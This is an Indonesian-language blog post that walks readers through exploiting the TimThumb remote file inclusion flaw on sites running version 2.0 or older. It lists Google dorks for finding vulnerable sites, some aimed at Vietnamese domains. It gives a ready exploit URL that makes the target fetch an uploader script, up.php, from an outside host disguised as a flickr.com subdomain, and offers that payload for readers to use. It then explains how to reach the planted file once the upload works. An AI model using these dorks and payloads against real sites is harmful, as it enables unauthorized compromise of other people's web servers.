Timthumb Remote File Inclusion
November 09, 2019
Halo temen-temen, di artikel sebelumnya gua membahas tentang Cara Membuat Exploit Timthumb, yang belum baca silahkan baca dulu. Nah kali ini gua akan mempraktekkan exploit yang sudah di buat tadi.
DORK:
inurl:timthumb.php site:vn
inurl:admin/timthumb.php site:vn
inurl:thumb.php
EXPLOIT:
?src=http://flickr.com.smpn3sugio.sch.id/up.php
Kebetulan disini gua udah punya target, btw teknik ini berlaku di timthumb versi 2.0 kebawah. Oke jika vuln tampilan nya seperti gambar di bawah.
Tambahkan exploit kalian, kalau ga punya bisa pakai punya gua
Jadinya seperti ini:
https://site.com/timthumb.php?src=http://flickr.com.smpn3sugio.sch.id/up.php
Nah kalau tampilan nya seperti gambar di atas berarti berhasil temen-temen, cara akses nya salin path setelah /public_html contoh nya seperti dibawah.
Oke temen-temen sekian dari gua semoga bermanfaat jangan lupa juga share ke temen-temen kalian see you.